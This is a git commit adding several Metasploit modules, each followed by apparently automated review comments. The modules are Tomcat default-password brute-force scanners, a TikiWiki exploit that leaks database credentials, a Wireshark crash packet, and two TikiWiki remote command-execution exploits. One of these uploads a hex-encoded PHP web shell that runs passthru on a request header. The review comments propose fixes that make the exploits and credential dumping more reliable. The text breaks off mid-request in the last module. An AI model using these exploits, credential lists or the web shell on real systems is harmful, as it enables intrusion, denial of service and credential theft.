added modules from Matteo Cantoni.

git-svn-id: file:///home/svn/framework3/trunk@6170 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
Mario Ceballos 2009-01-21 12:51:30 +00:00
parent 32868c4b0f
commit ff8323e6d2
6 changed files with 780 additions and 0 deletions


@ -0,0 +1,132 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::WMAPScanServer
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Tomcat Administration Tool default access',
'Version' => '$Revision: $',
'Description' => 'Detect Tomcat Administration Tool default access.',
'References' =>
[
['URL', 'http://tomcat.apache.org/'],
],
'Author' => 'Matteo Cantoni <goony[at]nothink.org>',
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(8180),
OptString.new('TOMCAT_USER', [ false, 'The username to authenticate as', '']),
OptString.new('TOMCAT_PASS', [ false, 'The password for the specified username', '']),
OptString.new('UserAgent', [ true, "The HTTP User-Agent sent in the request", 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' ]),
], self.class)
end
def run_host(ip)
begin
res = send_request_raw({
'method' => 'GET',
'uri' => '/',
}, 25)
if (res and res.code == 200)
ver = ""
if res.body.match(/<title>Apache Tomcat\/(.*)<\/title>/)
ver = "Apache Tomcat/" + $1
end
user = datastore['TOMCAT_USER'].to_s
pass = datastore['TOMCAT_PASS'].to_s
if user.length == 0
default_usernames = ['admin','manager','role1','root','tomcat']
else
default_usernames = [user]
end
if pass.length == 0
default_passwords = ['admin','manager','role1','root','tomcat']
else
default_passwords = [pass]
end
default_usernames.each do |username|
default_passwords.each do |password|
res = send_request_raw({
'method' => 'GET',
'uri' => '/admin/',
}, 25)
if (res and res.code == 200)
if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/JSESSIONID=(.*);(.*)/i))
jsessionid = $1
post_data = "j_username=#{username}&j_password=#{password}"
res = send_request_cgi({
'uri' => '/admin/j_security_check',
'method' => 'POST',
'content-type' => 'application/x-www-form-urlencoded',
'cookie' => "JSESSIONID=#{jsessionid}",
'data' => post_data,
}, 25)
if (res.code == 302)
res = send_request_cgi({
'uri' => "/admin/",
'method' => 'GET',
'cookie' => "JSESSIONID=#{jsessionid}",
}, 25)
if (res.code == 302)
res = send_request_cgi({
'uri' => "/admin/frameset.jsp",
'method' => 'GET',
'cookie' => "JSESSIONID=#{jsessionid}",
}, 25)
if (res.code == 200)
print_status("http://#{target_host}:#{rport}/admin [#{res.headers['Server']}] [#{ver}] [Tomcat Server Administration] [#{username}/#{password}]")
end
# LogOut
res = send_request_cgi({
'uri' => '/admin/logOut.do',
'method' => 'GET',
'cookie' => "JSESSIONID=#{jsessionid}",
}, 25)
end
end
end
end
end
end
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end
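Review bot: `res.code` is read without a nil guard at the three nested checks after the POST in run_host (`if (res.code == 302)`, the second `if (res.code == 302)` and `if (res.code == 200)`), although the same method guards its earlier responses with `res and`, so send_request_cgi evidently can return nil; when it does, NoMethodError is raised, and the rescue clauses at the end of the method (connection and timeout errors only) do not catch it, so one unresponsive host aborts the whole credential loop. Change each to the form already used above, e.g. `if (res and res.code == 302)`; the Application Manager module in this commit has the same unguarded `if (res.code == 200)` after its Basic-auth request. The Set-Cookie capture `/JSESSIONID=(.*);(.*)/i` is greedy, so a header with further `;`-separated attributes yields an id that runs up to the last semicolon; `/JSESSIONID=([^;]+)/i` captures only the token. The `/admin/` GET that obtains the session cookie is also repeated inside both loops for every username/password pair, although it depends on neither.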


@ -0,0 +1,95 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::WMAPScanServer
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Tomcat Application Manager default access',
'Version' => '$Revision: $',
'Description' => 'Detect Tomcat Web Application Manager default access.',
'References' =>
[
['URL', 'http://tomcat.apache.org/'],
],
'Author' => 'Matteo Cantoni <goony[at]nothink.org>',
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(8180),
OptString.new('TOMCAT_USER', [ false, 'The username to authenticate as', '']),
OptString.new('TOMCAT_PASS', [ false, 'The password for the specified username', '']),
OptString.new('UserAgent', [ true, "The HTTP User-Agent sent in the request", 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' ]),
], self.class)
end
def run_host(ip)
begin
res = send_request_raw({
'method' => 'GET',
'uri' => '/',
}, 25)
if (res and res.code == 200)
user = datastore['TOMCAT_USER'].to_s
pass = datastore['TOMCAT_PASS'].to_s
if user.length == 0
default_usernames = ['admin','manager','role1','root','tomcat']
else
default_usernames = [user]
end
if pass.length == 0
default_passwords = ['admin','manager','role1','root','tomcat']
else
default_passwords = [pass]
end
default_usernames.each do |username|
default_passwords.each do |password|
user_pass = Rex::Text.encode_base64("#{username}" + ":" + "#{password}")
begin
res = send_request_cgi({
'uri' => "/manager/html",
'method' => 'GET',
'headers' =>
{
'Authorization' => "Basic #{user_pass}",
}
}, 25)
if (res.code == 200)
print_status("http://#{target_host}:#{rport}/manager/html [#{res.headers['Server']}] [Tomcat Application Manager] [#{username}/#{password}]")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end
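Review bot: The Basic credential string in run_host is built as `"#{username}" + ":" + "#{password}"`, interpolating each variable only to concatenate again; `Rex::Text.encode_base64("#{username}:#{password}")` expresses the same value. The inner `begin`/`rescue` around the request is what lets the scan continue to the next pair after a connection error, so the identical outer rescue clauses at the end of run_host only cover the initial `/` probe and deserve a short comment saying so, e.g. `# only the initial probe reaches here; per-credential errors are handled inside the loop`. The `ip` parameter of run_host is unused in favour of `target_host` in the status line, which also holds for the Administration Tool module in this commit.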


@ -0,0 +1,120 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'TikiWiki information disclosure',
'Description' => %q{
A vulnerability has been reported in Tikiwiki, which can be exploited by
a anonymous user to dump the MySQL user & passwd just by creating a mysql
error with the "sort_mode" var.
The vulnerability has been reported in Tikiwiki version 1.9.5.
},
'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
['OSVDB', '30172'],
['BID', '20858'],
['CVE', '2006-5702'],
['MIL', '2701'],
['URL', 'http://secunia.com/advisories/22678/'],
],
'DisclosureDate' => 'Nov 1 2006',
'Actions' =>
[
['Download']
],
'DefaultAction' => 'Download'
))
register_options(
[
OptString.new('URI', [true, "TikiWiki directory path", "/tikiwiki"]),
], self.class)
end
def run
print_status("Establishing a connection to the target...")
rpath = datastore['URI'] + "/tiki-lastchanges.php?days=1&offset=0&sort_mode="
res = send_request_raw({
'uri' => rpath,
'method' => 'GET',
'headers' =>
{
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
'Connection' => 'Close',
}
}, 25)
if (res and res.message == "OK")
print_status("Get informations about database...")
n = 0
c = 0
infos = res.body.split(/\r|\n/)
infos.each do |row|
if (c < 6)
if (row.match(/\["file"\]=>/))
c+=1
x = n + 1
y = infos[x].match(/string\(\d+\) "(.*)"/m)
print_status("Install path : #{y[1]}")
end
if (row.match(/\["databaseType"\]=>/))
c+=1
x = n + 1
y = infos[x].match(/string\(\d+\) "(.*)"/m)
print_status("DB type : #{y[1]}")
end
if (row.match(/\["database"\]=>/))
c+=1
x = n + 1
y = infos[x].match(/string\(\d+\) "(.*)"/m)
print_status("DB name : #{y[1]}")
end
if (row.match(/\["host"\]=>/))
c+=1
x = n + 1
y = infos[x].match(/string\(\d+\) "(.*)"/m)
print_status("DB host : #{y[1]}")
end
if (row.match(/\["user"\]=>/))
c+=1
x = n + 1
y = infos[x].match(/string\(\d+\) "(.*)"/m)
print_status("DB user : #{y[1]}")
end
if (row.match(/\["password"\]=>/))
c+=1
x = n + 1
y = infos[x].match(/string\(\d+\) "(.*)"/m)
print_status("DB password : #{y[1]}")
end
n+=1
end
end
if (c == 0)
print_status("Could not obtain informations about database.")
end
else
print_status("No response from the server.")
end
end
end
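Review bot: Each of the six field branches in run indexes `y[1]` without checking that `infos[x].match(...)` succeeded, so a response that contains a `["file"]=>` marker but not the expected `string(N) "…"` on the following line raises NoMethodError instead of reporting a partial result, and `infos[x]` itself is nil when the marker is the last line. The six branches differ only in the key and the label, so a key-to-label table with one guarded lookup removes both the duplication and the crash, and the `c` counter then advances only on a successful extraction. Tracking `n` by hand next to `each` is replaced by `each_with_index`. Whether a row can carry more than one `["…"]=>` marker is not visible here; if it can, keep a per-key `match` instead of the single capture below.
```ruby
fields = { 'file' => 'Install path', 'databaseType' => 'DB type', 'database' => 'DB name',
           'host' => 'DB host', 'user' => 'DB user', 'password' => 'DB password' }
c = 0
infos = res.body.split(/\r|\n/)
infos.each_with_index do |row, n|
  break if c >= fields.size
  key = row[/\["(\w+)"\]=>/, 1]
  next unless key and fields.key?(key)
  y = infos[n + 1].to_s.match(/string\(\d+\) "(.*)"/m)
  next unless y
  c += 1
  print_status("#{fields[key]} : #{y[1]}")
end
# … unchanged: "Could not obtain informations" and "No response" branches …
```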


@ -0,0 +1,80 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
require 'scruby'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Ip
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Wireshark chunked_encoding_dissector function DOS',
'Description' => %q{
Wireshark crash when dissecting an HTTP chunked response.
Versions affected: 0.99.5 (Bug 1394)
},
'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
[ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1394'],
],
'DisclosureDate' => 'February 22 2007'))
end
def run
print_status("Sending packet to #{rhost}")
connect_ip
pkt =(
Scruby::IP.new(
:dst => "#{rhost}",
:flags => 4,
:len => 20,
:ttl => 53,
:id => 0x2eac,
:chksum => 0xfc13
)/Scruby::TCP.new(
:sport => 80,
:dport => 1296,
:seq => 1,
:ack => 323,
:window => 6432,
:chksum => 0xfc13,
:flags => 18
)/"\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x33\x30\x32\x20\x46\x6f\x75\x6e\x64\x0d\x0a\x44\x61\x74\x65\x3a\x20\x54\x68\x75\x2c\x20\x32\x32\x20\x46\x65\x62\x20\x32\x30\x30\x37\x20\x32\x31\x3a\x35\x39\x3a\x30\x33\x20\x47\x4d\x54\x0d\x0a\x53\x65\x72\x76\x65\x72\x3a\x20\x41\x70\x61\x63\x68\x65\x2f\x31\x2e\x33\x2e\x33\x37\x20\x28\x55\x6e\x69\x78\x29\x20\x50\x48\x50\x2f\x34\x2e\x34\x2e\x34\x20\x6d\x6f\x64\x5f\x74\x68\x72\x6f\x74\x74\x6c\x65\x2f\x33\x2e\x31\x2e\x32\x20\x6d\x6f\x64\x5f\x70\x73\x6f\x66\x74\x5f\x74\x72\x61\x66\x66\x69\x63\x2f\x30\x2e\x31\x20\x6d\x6f\x64\x5f\x73\x73\x6c\x2f\x32\x2e\x38\x2e\x32\x38\x20\x4f\x70\x65\x6e\x53\x53\x4c\x2f\x30\x2e\x39\x2e\x36\x62\x20\x46\x72\x6f\x6e\x74\x50\x61\x67\x65\x2f\x35\x2e\x30\x2e\x32\x2e\x32\x36\x33\x35\x0d\x0a\x58\x2d\x50\x6f\x77\x65\x72\x65\x64\x2d\x42\x79\x3a\x20\x50\x48\x50\x2f\x34\x2e\x34\x2e\x34\x0d\x0a\x4c\x6f\x63\x61\x74\x69\x6f\x6e\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x0d\x0a\x50\x33\x50\x3a\x20\x70\x6f\x6c\x69\x63\x79\x72\x65\x66\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x2f\x77\x33\x63\x2f\x70\x33\x70\x2e\x78\x6d\x6c\x22\x2c\x20\x43\x50\x3d\x22\x4e\x4f\x49\x20\x44\x53\x50\x20\x43\x4f\x52\x20\x4e\x49\x44\x20\x41\x44\x4d\x20\x44\x45\x56\x20\x50\x53\x41\x20\x4f\x55\x52\x20\x49\x4e\x44\x20\x55\x4e\x49\x20\x50\x55\x52\x20\x43\x4f\x4d\x20\x4e\x41\x56\x20\x49\x4e\x54\x20\x53\x54\x41\x22\x0d\x0a\x45\x78\x70\x69\x72\x65\x73\x3a\x20\x54\x68\x75\x2c\x20\x31\x39\x20\x4e\x6f\x76\x20\x31\x39\x38\x31\x20\x30\x38\x3a\x35\x32\x3a\x30\x30\x20\x47\x4d\x54\x0d\x0a\x50\x72\x61\x67\x6d\x61\x3a\x20\x6e\x6f\x2d\x63\x61\x63\x68\x65\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x44\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x20\x61\x74\x74\x61\x63\x68\x6d\x65\x6e\x74\x3b\x20\x66\x69\x6c\x65\x6e\x61\x6d\x65\x3d\x53\x74\x61\x74\x43\x6f\x75\x6e\x74\x65\x72\x2d\x4c\x6f\x67\x2d\x32\x32\x38\x37\x35\x39\x32\x2e\x63\x73\x76\x0d\x0a\x53\x65\x74\x2d\
x43\x6f\x6f\x6b\x69\x65\x3a\x20\x50\x48\x50\x53\x45\x53\x53\x49\x44\x3d\x64\x37\x35\x65\x64\x39\x37\x36\x66\x30\x30\x39\x64\x61\x31\x31\x38\x65\x62\x36\x31\x34\x62\x39\x38\x66\x64\x35\x62\x39\x31\x36\x25\x33\x42\x2b\x70\x61\x74\x68\x25\x33\x44\x25\x32\x46\x0d\x0a\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x3a\x20\x74\x69\x6d\x65\x6f\x75\x74\x3d\x31\x35\x2c\x20\x6d\x61\x78\x3d\x31\x30\x30\x0d\x0a\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x0d\x0a\x54\x72\x61\x6e\x73\x66\x65\x72\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x20\x63\x68\x75\x6e\x6b\x65\x64\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6f\x63\x74\x65\x74\x2d\x73\x74\x72\x65\x61\x6d\x0d\x0a\x0d\x0a\x30\x0d\x0a\x0d\x0a").to_net
ip_write(pkt)
disconnect_ip
end
end
=begin
HTTP/1.1 302 Found
Date: Thu, 22 Feb 2007 21:59:03 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4 mod_throttle/3.1.2 mod_psoft_traffic/0.1 mod_ssl/2.8.28 OpenSSL/0.9.6b FrontPage/5.0.2.2635
X-Powered-By: PHP/4.4.4
Location: http://127.0.0.1/index.html
P3P: policyref="http://127.0.0.1/w3c/p3p.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Disposition: attachment; filename=StatCounter-Log-2287592.csv
Set-Cookie: PHPSESSID=d75ed976f009da118eb614b98fd5b916%3B+path%3D%2F
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/octet-stream
0
=end
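Review bot: `disconnect_ip` at the end of run is skipped whenever `ip_write(pkt)` or the Scruby packet construction raises, leaving the raw socket opened by `connect_ip` behind; wrap the send as `begin; ip_write(pkt); ensure; disconnect_ip; end` so the socket is released on every path. The TCP payload is an unreadable run of `\x..` escapes that merely spells the HTTP response reproduced in the `=begin`/`=end` block below it; building it from that text (a `<<~EOS` heredoc with its lines joined by `"\r\n"`) keeps a single copy and makes the trigger reviewable. The literal also appears split across two lines in this view (`...\x2d\` / `x43...`), which looks like a rendering artifact of the page but is worth confirming in the committed file, since the string would not parse that way. `:chksum => 0xfc13` is passed unchanged for both the IP and TCP layers; unless Scruby recomputes checksums in `to_net`, at least one of them is wrong, which should at least be stated in a comment next to the values. The DisclosureDate `'February 22 2007'` also differs in form from the `Mon D YYYY` dates used by the other modules in this commit.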


@ -0,0 +1,149 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'TikiWiki tiki-graph_formula Remote Command Execution',
'Description' => %q{
TikiWiki (<= 1.9.8) contains a flaw that may allow a remote attacker to execute arbitrary commands.
The issue is due to 'tiki-graph_formula.php' script not properly sanitizing user input
supplied to the f variable, which may allow a remote attacker to execute arbitrary PHP
commands resulting in a loss of integrity.
},
'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
['OSVDB', '40478'],
['BID', '26006'],
['CVE', '2007-5423'],
['MIL', '4525'],
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 1024,
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [[ 'Automatic', { }]],
'DisclosureDate' => 'Oct 10 2007',
'DefaultTarget' => 0))
register_options(
[
OptString.new('URI', [true, "TikiWiki directory path", "/tikiwiki"]),
], self.class)
end
def check
res = send_request_raw({
'uri' => datastore['URI'] + "/tiki-index.php",
'method' => 'GET',
'headers' =>
{
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
'Connection' => 'Close',
}
}, 25)
if (res and res.message == "OK" and res.body.match(/TikiWiki v1.|TikiWiki 1./))
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
url_db_local = datastore['URI'] +
"/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.passthru(" +
"chr(101).chr(99).chr(104).chr(111).chr(32)." + "chr(89).chr(89).chr(89)." + "chr(59)." +
"chr(99).chr(97).chr(116).chr(32).chr(100).chr(98).chr(47).chr(108).chr(111).chr(99).chr(97).chr(108).chr(46).chr(112).chr(104).chr(112)." +
"chr(59)." + "chr(101).chr(99).chr(104).chr(111).chr(32)." + "chr(89).chr(89).chr(89)" +
").die()&t=png&title="
print_status("Sending request...")
res = send_request_raw({
'uri' => url_db_local,
'method' => 'GET',
'headers' =>
{
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
'Connection' => 'Close',
}
}, 25)
if (res and res.message == "OK" and res.body)
print_status("The server returned : #{res.code} #{res.message}")
print_status("Server version : #{res.headers['Server']}")
db_tiki = res.body.match(/db_tiki='(.*?)';/m)
dbversion = res.body.match(/dbversion_tiki='(.*?)';/m)
host_tiki = res.body.match(/host_tiki='(.*?)';/m)
user_tiki = res.body.match(/user_tiki='(.*?)';/m)
pass_tiki = res.body.match(/pass_tiki='(.*?)';/m)
dbs_tiki = res.body.match(/dbs_tiki='(.*?)';/m)
print_status("TikiWiki database informations : \n")
print("db_tiki : " + db_tiki[1] + "\n")
print("dbversion : " + dbversion[1] + "\n")
print("host_tiki : " + host_tiki[1] + "\n")
print("user_tiki : " + user_tiki[1] + "\n")
print("pass_tiki : " + pass_tiki[1] + "\n")
print("dbs_tiki : " + dbs_tiki[1] + "\n\n")
else
print_status("No response from the server")
end
command = Rex::Text.uri_encode(payload.encoded)
encoded = payload.encoded.unpack('C*').map { |c| "chr(#{c})"}.join('.') + ".chr(32)"
url_cmd = datastore['URI'] + "/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.passthru(" +
"chr(101).chr(99).chr(104).chr(111).chr(32)." + "chr(89).chr(89).chr(89)." + "chr(59)." + encoded + ".chr(59)." +
"chr(101).chr(99).chr(104).chr(111).chr(32)." + "chr(89).chr(89).chr(89)" + ").die()&t=png&title="
print_status("Sending request...")
res = send_request_raw({
'uri' => url_cmd,
'method' => 'GET',
'headers' =>
{
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
'Connection' => 'Close',
}
}, 25)
if (res and res.message == "OK" and res.body)
print_status("The server returned : #{res.code} #{res.message}")
cmd_output = res.body.match(/YYY\n(.*)\nYYY/m)
if (cmd_output)
print_status("Command output from the server :")
print("\n" + cmd_output[1] + "\n\n")
else
print_status("This server may not be vulnerable")
end
else
print_status("No response from the server")
end
end
end
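Review bot: The six `res.body.match(...)` results in exploit (`db_tiki` through `dbs_tiki`) are indexed with `[1]` unconditionally, so a 200 response whose body lacks any one of those assignments (a patched or differently configured host) raises NoMethodError before the payload request is ever sent; a loop over the key names with a nil check reports what was found and carries on (labels become the key names). `command = Rex::Text.uri_encode(payload.encoded)` on the following line is assigned and never used and can be dropped. In check, `/TikiWiki v1.|TikiWiki 1./` uses unescaped dots and returns Vulnerable for any 1.x banner, including releases past the 1.9.8 upper bound given in the description; escape the dots and narrow the pattern to the affected range, or return a weaker verdict. The `User-Agent` and `'Connection' => 'Close'` headers are repeated in every request hash in this and the other modules of the commit; a shared helper would remove that duplication.
```ruby
print_status("TikiWiki database informations : \n")
%w[db_tiki dbversion_tiki host_tiki user_tiki pass_tiki dbs_tiki].each do |key|
  m = res.body.match(/#{key}='(.*?)';/m)
  print("#{key} : #{m ? m[1] : '(not found)'}\n")
end
print("\n")
# … unchanged: payload request and YYY-delimited output parsing …
```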


@ -0,0 +1,204 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'TikiWiki jhot Remote Command Execution',
'Description' => %q{
TikiWiki contains a flaw that may allow a malicious user to execute
arbitrary PHP code. The issue is triggered due to the jhot.php script
not correctly verifying uploaded files. It is possible that the flaw
may allow arbitrary PHP code execution by uploading a malicious PHP
script resulting in a loss of integrity.
The vulnerability has been reported in Tikiwiki version 1.9.4.
},
'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
['OSVDB', '28456'],
['BID', '19819'],
['CVE', '2006-4602'],
['MIL', '2288'],
['URL', 'http://secunia.com/advisories/21733/'],
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 1024,
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [[ 'Automatic', { }]],
'DisclosureDate' => 'Sep 2 2006',
'DefaultTarget' => 0))
register_options(
[
OptString.new('URI', [true, "TikiWiki directory path", "/tikiwiki/"]),
], self.class)
end
def check
res = send_request_raw({
'uri' => datastore['URI'] + "/tiki-index.php",
'method' => 'GET',
'headers' =>
{
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
'Connection' => 'Close',
}
}, 25)
if (res and res.message == "OK" and res.body.match(/TikiWiki 1.9.4/))
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
create_temp_file()
command = payload.encoded
exe_command(command)
remove_temp_file()
end
def create_temp_file
url_jhot = datastore['URI'] + "/jhot.php"
scode =
"\x0d\x0a\x3c\x3f\x70\x68\x70\x0d\x0a\x2f\x2f\x20\x24\x48\x65\x61" +
"\x64\x65\x72\x3a\x20\x2f\x63\x76\x73\x72\x6f\x6f\x74\x2f\x74\x69" +
"\x6b\x69\x77\x69\x6b\x69\x2f\x74\x69\x6b\x69\x2f\x74\x69\x6b\x69" +
"\x2d\x63\x6f\x6e\x66\x69\x67\x2e\x70\x68\x70\x2c\x76\x20\x31\x2e" +
"\x38\x2e\x32\x2e\x35\x20\x32\x30\x30\x35\x2f\x30\x38\x2f\x32\x32" +
"\x20\x30\x38\x3a\x30\x30\x3a\x35\x33\x20\x74\x65\x6c\x65\x6e\x69" +
"\x65\x6b\x6f\x20\x45\x78\x70\x20\x24\x0d\x0a\x0d\x0a\x2f\x2f\x20" +
"\x43\x6f\x70\x79\x72\x69\x67\x68\x74\x20\x28\x63\x29\x20\x32\x30" +
"\x30\x32\x2d\x32\x30\x30\x35\x2c\x20\x4c\x75\x69\x73\x20\x41\x72" +
"\x67\x65\x72\x69\x63\x68\x2c\x20\x47\x61\x72\x6c\x61\x6e\x64\x20" +
"\x46\x6f\x73\x74\x65\x72\x2c\x20\x45\x64\x75\x61\x72\x64\x6f\x20" +
"\x50\x6f\x6c\x69\x64\x6f\x72\x2c\x20\x65\x74\x2e\x20\x61\x6c\x2e" +
"\x0d\x0a\x2f\x2f\x20\x41\x6c\x6c\x20\x52\x69\x67\x68\x74\x73\x20" +
"\x52\x65\x73\x65\x72\x76\x65\x64\x2e\x20\x53\x65\x65\x20\x63\x6f" +
"\x70\x79\x72\x69\x67\x68\x74\x2e\x74\x78\x74\x20\x66\x6f\x72\x20" +
"\x64\x65\x74\x61\x69\x6c\x73\x20\x61\x6e\x64\x20\x61\x20\x63\x6f" +
"\x6d\x70\x6c\x65\x74\x65\x20\x6c\x69\x73\x74\x20\x6f\x66\x20\x61" +
"\x75\x74\x68\x6f\x72\x73\x2e\x0d\x0a\x2f\x2f\x20\x4c\x69\x63\x65" +
"\x6e\x73\x65\x64\x20\x75\x6e\x64\x65\x72\x20\x74\x68\x65\x20\x47" +
"\x4e\x55\x20\x4c\x45\x53\x53\x45\x52\x20\x47\x45\x4e\x45\x52\x41" +
"\x4c\x20\x50\x55\x42\x4c\x49\x43\x20\x4c\x49\x43\x45\x4e\x53\x45" +
"\x2e\x20\x53\x65\x65\x20\x6c\x69\x63\x65\x6e\x73\x65\x2e\x74\x78" +
"\x74\x20\x66\x6f\x72\x20\x64\x65\x74\x61\x69\x6c\x73\x2e\x0d\x0a" +
"\x0d\x0a\x23\x20\x24\x48\x65\x61\x64\x65\x72\x3a\x20\x2f\x63\x76" +
"\x73\x72\x6f\x6f\x74\x2f\x74\x69\x6b\x69\x77\x69\x6b\x69\x2f\x74" +
"\x69\x6b\x69\x2f\x62\x61\x6e\x6e\x65\x72\x5f\x69\x6d\x61\x67\x65" +
"\x2e\x70\x68\x70\x2c\x76\x20\x31\x2e\x38\x2e\x32\x2e\x35\x20\x32" +
"\x30\x30\x35\x2f\x30\x38\x2f\x32\x32\x20\x30\x38\x3a\x30\x30\x3a" +
"\x35\x33\x20\x74\x65\x6c\x65\x6e\x69\x65\x6b\x6f\x20\x45\x78\x70" +
"\x20\x24\x0d\x0a\x0d\x0a\x2f\x2f\x20\x74\x69\x6b\x69\x77\x69\x6b" +
"\x69\x20\x63\x6f\x6e\x66\x69\x67\x75\x72\x61\x74\x69\x6f\x6e\x20" +
"\x73\x63\x72\x69\x70\x74\x0d\x0a\x0d\x0a\x65\x76\x61\x6c\x28\x62" +
"\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x22\x5a\x58" +
"\x4a\x79\x62\x33\x4a\x66\x63\x6d\x56\x77\x62\x33\x4a\x30\x61\x57" +
"\x35\x6e\x4b\x44\x41\x70\x4f\x33\x4e\x6c\x64\x46\x39\x30\x61\x57" +
"\x31\x6c\x58\x32\x78\x70\x62\x57\x6c\x30\x4b\x44\x41\x70\x4f\x32" +
"\x56\x6a\x61\x47\x38\x67\x49\x6d\x31\x35\x58\x32\x52\x6c\x62\x47" +
"\x6c\x74\x49\x6a\x74\x77\x59\x58\x4e\x7a\x64\x47\x68\x79\x64\x53" +
"\x67\x6b\x58\x31\x4e\x46\x55\x6c\x5a\x46\x55\x6c\x73\x69\x53\x46" +
"\x52\x55\x55\x46\x39\x44\x54\x45\x6c\x46\x54\x6c\x52\x66\x53\x56" +
"\x41\x69\x58\x53\x6b\x37\x22\x29\x29\x3b\x0d\x0a\x3f\x3e\x0d\x0a"
data =
"-----------------------------7d529a1d23092a\r\n" +
"Content-Disposition: form-data; name=\"filepath\"; filename=\"tiki-config.php\";\r\n\r\n" +
scode +
"\r\n" +
"-----------------------------7d529a1d23092a--\r\n"
res = send_request_cgi({
'uri' => url_jhot,
'method' => 'POST',
'data' => "#{data}",
'headers' =>
{
